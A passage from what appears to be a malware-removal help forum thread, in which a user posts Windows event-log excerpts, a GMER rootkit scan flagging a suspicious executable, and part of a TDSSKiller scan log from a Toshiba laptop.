Error: (10/14/2014 00:28:16 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException
Stack:
   at DynamicClass.CallSite.Target(System.Runtime.CompilerServices.Closure, System.Runtime.CompilerServices.CallSite, System.Object, System.Object, System.Object, Int32, Int32, Int32)
   at System.Dynamic.UpdateDelegates.UpdateAndExecute6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.Runtime.CompilerServices.CallSite, System.__Canon, System.__Canon, System.__Canon, Int32, Int32, Int32)
   at System.Management.Automation.Interpreter.DynamicInstruction`7[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Int32, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.ScriptBlock.InvokeWithPipeImpl(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock+<>c__DisplayClass4.<InvokeWithPipe>b__2()
   at System.Management.Automation.Runspaces.RunspaceBase.RunActionIfNoRunningPipelinesWithThreadCheck(System.Action)
   at System.Management.Automation.ScriptBlock.InvokeWithPipe(Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Management.Automation.Internal.Pipe, System.Management.Automation.InvocationInfo, System.Object[])
   at System.Management.Automation.ScriptBlock.InvokeUsingCmdlet(System.Management.Automation.Cmdlet, Boolean, ErrorHandlingBehavior, System.Object, System.Object, System.Object, System.Object[])
   at Microsoft.PowerShell.Commands.InvokeExpressionCommand.ProcessRecord()
   at System.Management.Automation.Cmdlet.DoProcessRecord()
   at System.Management.Automation.CommandProcessor.ProcessRecord()
   at System.Management.Automation.CommandProcessorBase.DoExecute()
   at System.Management.Automation.Internal.PipelineProcessor.Inject(System.Object, Boolean)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.PipelineOps.InvokePipeline(System.Object, Boolean, System.Management.Automation.CommandParameterInternal[][], System.Management.Automation.Language.CommandBaseAst[], System.Management.Automation.CommandRedirection[][], System.Management.Automation.Language.FunctionContext)
   at System.Management.Automation.Interpreter.ActionCallInstruction`6[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.Boolean, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089],[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]].Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.EnterTryCatchFinallyInstruction.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.Interpreter.Run(System.Management.Automation.Interpreter.InterpretedFrame)
   at System.Management.Automation.Interpreter.LightLambda.RunVoid1[[System.__Canon, mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089]](System.__Canon)
   at System.Management.Automation.DlrScriptCommandProcessor.RunClause(System.Action`1<System.Management.Automation.Language.FunctionContext>, System.Object, System.Object)
   at System.Management.Automation.DlrScriptCommandProcessor.Complete()
   at System.Management.Automation.CommandProcessorBase.DoComplete()
   at System.Management.Automation.Internal.PipelineProcessor.DoCompleteCore(System.Management.Automation.CommandProcessorBase)
   at System.Management.Automation.Internal.PipelineProcessor.SynchronousExecuteEnumerate(System.Object, System.Collections.Hashtable, Boolean)
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeHelper()
   at System.Management.Automation.Runspaces.LocalPipeline.InvokeThreadProc()
   at System.Management.Automation.Runspaces.PipelineThread.WorkerProc()
   at System.Threading.ThreadHelper.ThreadStart_Context(System.Object)
   at System.Threading.ExecutionContext.RunInternal(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object, Boolean)
   at System.Threading.ExecutionContext.Run(System.Threading.ExecutionContext, System.Threading.ContextCallback, System.Object)
   at System.Threading.ThreadHelper.ThreadStart()

Error: (10/14/2014 00:27:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Faulting application name: svchost.exe_wcncsvc, version: 6.2.9200.16420, time stamp: 0x505a9a4e
Faulting module name: ntdll.dll, version: 6.2.9200.16912, time stamp: 0x536464ba
Exception code: 0xc0000005
Fault offset: 0x00000000000413e0
Faulting process id: 0x15b8
Faulting application start time: 0xsvchost.exe_wcncsvc0
Faulting application path: svchost.exe_wcncsvc1
Faulting module path: svchost.exe_wcncsvc2
Report Id: svchost.exe_wcncsvc3
Faulting package full name: svchost.exe_wcncsvc4
Faulting package-relative application ID: svchost.exe_wcncsvc5

Error: (10/14/2014 00:19:57 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/14/2014 00:13:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/14/2014 11:43:42 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/14/2014 11:13:41 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/14/2014 10:43:40 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.

Error: (10/14/2014 10:13:40 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: Activation of app microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail failed with error: -2147024891 See the Microsoft-Windows-TWinUI/Operational log for additional information.


System errors:
=============
Error: (10/14/2014 07:34:20 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: C:\windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}2{ECF5BF46-E3B6-449A-B56B-43F58F867814}

Error: (10/14/2014 07:34:20 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: C:\windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}2{ECF5BF46-E3B6-449A-B56B-43F58F867814}

Error: (10/14/2014 07:31:57 PM) (Source: DCOM) (EventID: 10000) (User: Toshiba_Laptop)
Description: C:\windows\system32\DllHost.exe /Processid:{F32D97DF-E3E5-4CB9-9E3E-0EB5B4E49801}2{883FF1FC-09E1-48E5-8E54-E2469ACB0CFD}

Error: (10/14/2014 07:30:36 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: C:\windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}2{ECF5BF46-E3B6-449A-B56B-43F58F867814}

Error: (10/14/2014 07:30:35 PM) (Source: DCOM) (EventID: 10000) (User: NT AUTHORITY)
Description: C:\windows\system32\DllHost.exe /Processid:{E10F6C3A-F1AE-4ADC-AA9D-2FE65525666E}2{ECF5BF46-E3B6-449A-B56B-43F58F867814}

Error: (10/14/2014 03:49:26 PM) (Source: DCOM) (EventID: 10000) (User: Toshiba_Laptop)
Description: C:\windows\SysWOW64\DllHost.exe /Processid:{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}2{AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/14/2014 03:46:19 PM) (Source: DCOM) (EventID: 10000) (User: Toshiba_Laptop)
Description: C:\windows\SysWOW64\DllHost.exe /Processid:{AD3EDBCA-0901-415B-82E9-C16D3B65E38C}2{3519154C-227E-47F3-9CC9-12C3F05817F1}

Error: (10/14/2014 03:37:25 PM) (Source: DCOM) (EventID: 10010) (User: Toshiba_Laptop)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/14/2014 03:35:25 PM) (Source: DCOM) (EventID: 10010) (User: Toshiba_Laptop)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}

Error: (10/14/2014 03:33:25 PM) (Source: DCOM) (EventID: 10010) (User: Toshiba_Laptop)
Description: {AB8902B4-09CA-4BB6-B78D-A8F59079A8D5}


Microsoft Office Sessions:
=========================
Error: (10/14/2014 03:31:20 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2147467263

Error: (10/14/2014 00:28:16 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: powershell.exe6.2.9200.1638450109cceunknown0.0.0.000000000c000000502e80e1019e401cfe7e4fe74e488C:\windows\syswow64\windowspowershell\v1.0\powershell.exeunknown3eca3bc5-53d8-11e4-bec7-7054d211192a

Error: (10/14/2014 00:28:16 PM) (Source: .NET Runtime) (EventID: 1026) (User: )
Description: Application: powershell.exe
Framework Version: v4.0.30319
Description: The process was terminated due to an unhandled exception.
Exception Info: System.AccessViolationException

Error: (10/14/2014 00:27:37 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: svchost.exe_wcncsvc6.2.9200.16420505a9a4entdll.dll6.2.9200.16912536464bac000000500000000000413e015b801cfe758938ee950C:\windows\system32\svchost.exeC:\windows\SYSTEM32\ntdll.dll271b8be2-53d8-11e4-bec7-7054d211192a

Error: (10/14/2014 00:19:57 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2147024891

Error: (10/14/2014 00:13:43 PM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2147024891

Error: (10/14/2014 11:43:42 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2147024891

Error: (10/14/2014 11:13:41 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2147024891

Error: (10/14/2014 10:43:40 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2147024891

Error: (10/14/2014 10:13:40 AM) (Source: Microsoft-Windows-Immersive-Shell) (EventID: 5973) (User: Toshiba_Laptop)
Description: microsoft.windowscommunicationsapps_8wekyb3d8bbwe!Microsoft.WindowsLive.Mail-2147024891


CodeIntegrity Errors:
===================================
  Date: 2013-01-24 18:09:26.018
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\audiodg.exe because the set of per-page image hashes could not be found on the system.

  Date: 2013-01-24 18:09:24.287
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\audiodg.exe because the set of per-page image hashes could not be found on the system.

  Date: 2013-01-24 18:09:22.524
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\audiodg.exe because the set of per-page image hashes could not be found on the system.

  Date: 2013-01-24 16:30:03.624
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\audiodg.exe because the set of per-page image hashes could not be found on the system.

  Date: 2013-01-24 16:30:00.894
  Description: Code Integrity is unable to verify the image integrity of the file \Device\HarddiskVolume4\Windows\System32\MMDevAPI.dll because the set of per-page image hashes could not be found on the system.


==================== Memory info =========================== 

Processor: AMD A6-4400M APU with Radeon(tm) HD Graphics 
Percentage of memory in use: 27%
Total physical RAM: 11740.73 MB
Available physical RAM: 8469.18 MB
Total Pagefile: 23516.73 MB
Available Pagefile: 19568.83 MB
Total Virtual: 8192 MB
Available Virtual: 8191.83 MB

==================== Drives ================================

Drive c: (TI10649600G) (Fixed) (Total:586 GB) (Free:307.85 GB) NTFS

==================== MBR & Partition Table ==================

========================================================
Disk: 0 (Size: 596.2 GB) (Disk ID: 00000000)

Partition: GPT Partition Type.

==================== End Of Log ============================


#5 JeremyAndrew

Posted 14 October 2014 - 11:06 PM

Ran out of room.  Here is the GMER log.  It said it couldn't look at my ntdat file and that it couldn't look at sys.config because it was being used.

GMER 2.1.19357 - http://www.gmer.net
Rootkit scan 2014-10-14 20:45:09
Windows 6.2.9200  x64 \Device\Harddisk0\DR0 -> \Device\00000039 Hitachi_HTS547564A9E384 rev.JEDOA60B 596.17GB
Running: vu0ul4gn.exe; Driver: C:\Users\JEREMY~1\AppData\Local\Temp\kgldrkog.sys


---- Threads - GMER 2.1 ----

Thread   C:\windows\system32\csrss.exe [7052:5708]                                                                                                  fffff9600085f5e8
Thread   C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe [8512:9532]                                                                        000000006a8c9af7
Thread   C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe [8512:908]                                                                         000000006a8c9af7
Thread   C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe [8512:8904]                                                                        0000000077bb5087
Thread   C:\Program Files (x86)\Windows Live\Contacts\wlcomm.exe [8512:4252]                                                                        0000000077bb5087
---- Processes - GMER 2.1 ----

Process  C:\Users\Jeremy and Heidi\Desktop\vu0ul4gn.exe (*** suspicious ***) @ C:\Users\Jeremy and Heidi\Desktop\vu0ul4gn.exe [4552](2014-10-14 19  0000000000400000

---- Disk sectors - GMER 2.1 ----

Disk     \Device\Harddisk0\DR0                                                                                                                      unknown MBR code

---- EOF - GMER 2.1 ----

  Finally, here is the TDSSkiller log.  I remember running this about three weeks ago and I did delete or quarantine the threats it found.  So no surprise that no threats found this time.  I don't think I kept that log, but I'll noodle around and see if I can find it. 

20:46:04.0225 0x1d4c  TDSS rootkit removing tool 3.0.0.40 Jul 10 2014 12:37:58
20:46:04.0225 0x1d4c  UEFI system
20:46:14.0989 0x1d4c  ============================================================
20:46:14.0989 0x1d4c  Current date / time: 2014/10/14 20:46:14.0989
20:46:14.0989 0x1d4c  SystemInfo:
20:46:14.0989 0x1d4c  
20:46:14.0989 0x1d4c  OS Version: 6.2.9200 ServicePack: 0.0
20:46:14.0989 0x1d4c  Product type: Workstation
20:46:14.0989 0x1d4c  ComputerName: TOSHIBA_LAPTOP
20:46:14.0989 0x1d4c  UserName: Jeremy and Heidi
20:46:14.0989 0x1d4c  Windows directory: C:\windows
20:46:14.0989 0x1d4c  System windows directory: C:\windows
20:46:14.0989 0x1d4c  Running under WOW64
20:46:14.0989 0x1d4c  Processor architecture: Intel x64
20:46:14.0989 0x1d4c  Number of processors: 2
20:46:14.0989 0x1d4c  Page size: 0x1000
20:46:14.0989 0x1d4c  Boot type: Normal boot
20:46:14.0989 0x1d4c  ============================================================
20:46:31.0514 0x1d4c  KLMD registered as C:\windows\system32\drivers\88081295.sys
20:46:31.0880 0x1d4c  System UUID: {4C260FA8-9060-F30C-8C83-35C78A02E44B}
20:46:32.0488 0x1d4c  Drive \Device\Harddisk0\DR0 - Size: 0x950B056000 ( 596.17 Gb ), SectorSize: 0x200, Cylinders: 0x13001, SectorsPerTrack: 0x3F, TracksPerCylinder: 0xFF, Type 'K0', Flags 0x00000040
20:46:32.0488 0x1d4c  ============================================================
20:46:32.0488 0x1d4c  \Device\Harddisk0\DR0:
20:46:32.0488 0x1d4c  GPT partitions:
20:46:32.0504 0x1d4c  \Device\Harddisk0\DR0\Partition1: GPT, TypeGUID: {DE94BBA4-06D1-4D40-A16A-BFD50179D6AC}, UniqueGUID: {B6F7492D-FF51-11E1-B2D8-4C72B9B04871}, Name: Basic data partition, StartLBA 0x800, BlocksNum 0xE1000
20:46:32.0504 0x1d4c  \Device\Harddisk0\DR0\Partition2: GPT, TypeGUID: {C12A7328-F81F-11D2-BA4B-00A0C93EC93B}, UniqueGUID: {B6F74935-FF51-11E1-B2D8-4C72B9B04871}, Name: Basic data partition, StartLBA 0xE1800, BlocksNum 0x82000
20:46:32.0504 0x1d4c  \Device\Harddisk0\DR0\Partition3: GPT, TypeGUID: {E3C9E316-0B5C-4DB8-817D-F92DF00215AE}, UniqueGUID: {B6F74937-FF51-11E1-B2D8-4C72B9B04871}, Name: Basic data partition, StartLBA 0x163800, BlocksNum 0x40000
20:46:32.0504 0x1d4c  \Device\Harddisk0\DR0\Partition4: GPT, TypeGUID: {EBD0A0A2-B9E5-4433-87C0-68B6B72699C7}, UniqueGUID: {B6F7493F-FF51-11E1-B2D8-4C72B9B04871}, Name: Basic data partition, StartLBA 0x1A3800, BlocksNum 0x493FD800
20:46:32.0504 0x1d4c  \Device\Harddisk0\DR0\Partition5: GPT, TypeGUID: {DE94BBA4-06D1-4D40-A16A-BFD50179D6AC}, UniqueGUID: {C8FB6A2F-CED5-4CB3-9FF5-F5BB481EEFD3}, Name: Basic data partition, StartLBA 0x495A1000, BlocksNum 0x12B7000
20:46:32.0504 0x1d4c  MBR partitions:
20:46:32.0504 0x1d4c  ============================================================
20:46:32.0535 0x1d4c  C: <-> \Device\Harddisk0\DR0\Partition4
20:46:32.0535 0x1d4c  ============================================================
20:46:32.0535 0x1d4c  Initialize success
20:46:32.0535 0x1d4c  ============================================================
20:46:58.0838 0x1e50  ============================================================
20:46:58.0838 0x1e50  Scan started
20:46:58.0838 0x1e50  Mode: Manual; 
20:46:58.0838 0x1e50  ============================================================
20:46:58.0838 0x1e50  KSN ping started
20:47:01.0339 0x1e50  KSN ping finished: true
20:47:03.0262 0x1e50  ================ Scan system memory ========================
20:47:03.0262 0x1e50  System memory - ok
20:47:03.0262 0x1e50  ================ Scan services =============================
20:47:11.0919 0x1e50  HpSAMD - ok
20:47:12.0029 0x1e50  [ 82C47A85494249623F40E43C7B04051C, 97EF087B49219B68686914B250634FF67D13B7D3F81562614F108D2A40BEBA54 ] HPSupportSolutionsFrameworkService C:\Program Files (x86)\Hp\Common\HPSupportSolutionsFrameworkService.exe
20:47:12.0029 0x1e50  HPSupportSolutionsFrameworkService - ok
20:47:12.0107 0x1e50  [ F4A91D985EB9D1D2717D538F3424603C, 454AD2FF3A7963B9835AEF300F6672F92D0CCF59593BA2CCC83F0EC1446BB659 ] HTTP            C:\windows\system32\drivers\HTTP.sys
20:47:12.0122 0x1e50  HTTP - ok
20:47:12.0169 0x1e50  [ 2A98301068801700906C06649860FE94, 664394A52326289DCA0828B0041A105653F4FEF3E3DCCC3787AAE0F6FDC73A14 ] hwpolicy        C:\windows\system32\drivers\hwpolicy.sys
20:47:12.0169 0x1e50  hwpolicy - ok
20:47:12.0185 0x1e50  [ DC76901D82097C9E297F20C287CB9A27, 01A412D0D8A65050BE4250A7C4B9F98A4C43FD891827761E0C830369A5F9F09C ] hyperkbd        C:\windows\System32\drivers\hyperkbd.sys
20:47:12.0185 0x1e50  hyperkbd - ok
20:47:12.0216 0x1e50  [ 716413AB3CA12DE0A7222D28C1C9352C, B82B586BD9DBD70DDA19A02504E8CB00DA53677703AB848B53387601C5BAD3D3 ] HyperVideo      C:\windows\system32\DRIVERS\HyperVideo.sys
20:47:12.0216 0x1e50  HyperVideo - ok
20:47:12.0231 0x1e50  [ C9E9CBF73AFFBFE3E801EFB516787BA3, 1A850D614BDA6AA4195CC657702BC6242BA51B90131717743182AA160F65E72C ] i8042prt        C:\windows\System32\drivers\i8042prt.sys
20:47:12.0231 0x1e50  i8042prt - ok
20:47:12.0278 0x1e50  [ 5E394EBD26FD68AA9300332C46BEDD62, 56A5DA7CE08C07B519E55D0A46AA9D10B640349808EFE02B3278267B75B5F603 ] iaStorV         C:\windows\system32\drivers\iaStorV.sys
20:47:12.0294 0x1e50  iaStorV - ok
20:47:12.0309 0x1e50  [ 24847A06B84339FEEDE5CABF3D27D320, 7727B1DAD0D4A1D474FBBEFCEBDF36A1F07D1AA300869AE57A24ED91BF84B6B4 ] iirsp           C:\windows\system32\drivers\iirsp.sys
20:47:12.0309 0x1e50  iirsp - ok
20:47:12.0403 0x1e50  [ E455C83E029121270BED73CDAC381F37, 433D525C19DBF26FAC28853C606C872D973104842B0EF1B2BF2EAC85457E2953 ] IKEEXT          C:\windows\System32\ikeext.dll
20:47:12.0434 0x1e50  IKEEXT - ok
20:47:12.0606 0x1e50  [ 3E6A9B228D7FC87C3A1C731B79BD0499, F203C3645419095989594313625AF1FB83A5F9B7F8A495A8EBCB63DFBF00D7ED ] IntcAzAudAddService C:\windows\system32\drivers\RTKVHD64.sys
20:47:12.0699 0x1e50  IntcAzAudAddService - ok
20:47:12.0731 0x1e50  [ 4F37726CF764CA18A8A84F85EF3A7F24, 6212B23917526E127CE641A11A58DA93651FFE70829C4079FE465DBDC81CF470 ] intelide        C:\windows\system32\drivers\intelide.sys
20:47:12.0731 0x1e50  intelide - ok
20:47:12.0793 0x1e50  [ E15CDF68DD73423F15D4AC404793AF0D, E2D0136AF68D1A73EB3A63C83284B4661222CB0A4AFACCF276CB57CBD4850287 ] intelppm        C:\windows\System32\drivers\intelppm.sys
20:47:12.0793 0x1e50  intelppm - ok
20:47:12.0824 0x1e50  [ 8FCA66234A0933D796BB780B7953BAB9, 7DD677F5EE09A8D7A75C9E475B5E6B3DCA49D1E846C7D160B839D7029B1C5B6D ] IpFilterDriver  C:\windows\system32\DRIVERS\ipfltdrv.sys
20:47:12.0824 0x1e50  IpFilterDriver - ok
20:47:12.0902 0x1e50  [ C217B8D2E58C57A319B16125C3D4B69C, 905BB858E1782BD08FF080A4A604CE662440A15601B178FBD30269C306C04CCF ] iphlpsvc        C:\windows\System32\iphlpsvc.dll
20:47:12.0918 0x1e50  iphlpsvc - ok
20:47:12.0965 0x1e50  [ A4071DA3AE419F9694BFCB267C7DB8D7, 392DEE1DA51606C29418A98D2861F115E9F67C688B4281C53E87BA73A98809FB ] IPMIDRV         C:\windows\System32\drivers\IPMIDrv.sys
20:47:12.0965 0x1e50  IPMIDRV - ok
20:47:12.0996 0x1e50  [ 3969B9C218DD3FAA9F4ED2FFC3651C02, 93447F124CC55FB17055126432194153E1BB8F0FD95A47608494B6834A5F7089 ] IPNAT           C:\windows\system32\drivers\ipnat.sys
20:47:13.0011 0x1e50  IPNAT - ok
20:47:13.0058 0x1e50  [ 6BF622C46721CF6E2B35E868F319E6EB, 926D3C6334D8AF8A248A361D1F7C0A655835572ED8AC6F1D7932E1FA7A26B50A ] iPod Service    C:\Program Files\iPod\bin\iPodService.exe
20:47:13.0074 0x1e50  iPod Service - ok
20:47:13.0105 0x1e50  [ 25CD7C4BB2863FFC2B0B311F0AEBF77C, 4099BAA2DB4ADB93B878D71E241B7D9EB7E0EE7ED0FE2450CCB9E4718B3726EB ] IRENUM          C:\windows\system32\drivers\irenum.sys
20:47:13.0105 0x1e50  IRENUM - ok
20:47:13.0136 0x1e50  [ D940C5BB9DC92E588533C19ABCC3D2C2, D1442854CEDE86F2C187A35851E74C873D34B772C60BC118FA1577F79C03364D ] isapnp          C:\windows\system32\drivers\isapnp.sys
20:47:13.0136 0x1e50  isapnp - ok
20:47:13.0183 0x1e50  [ E6530FD4F61B40F338BF4355A21B9A09, FE9BF039B9901BEC260A69F7C49ACFA9881AD470DCCBA70C7EC36F518DA71702 ] iScsiPrt        C:\windows\System32\drivers\msiscsi.sys
20:47:13.0199 0x1e50  iScsiPrt - ok
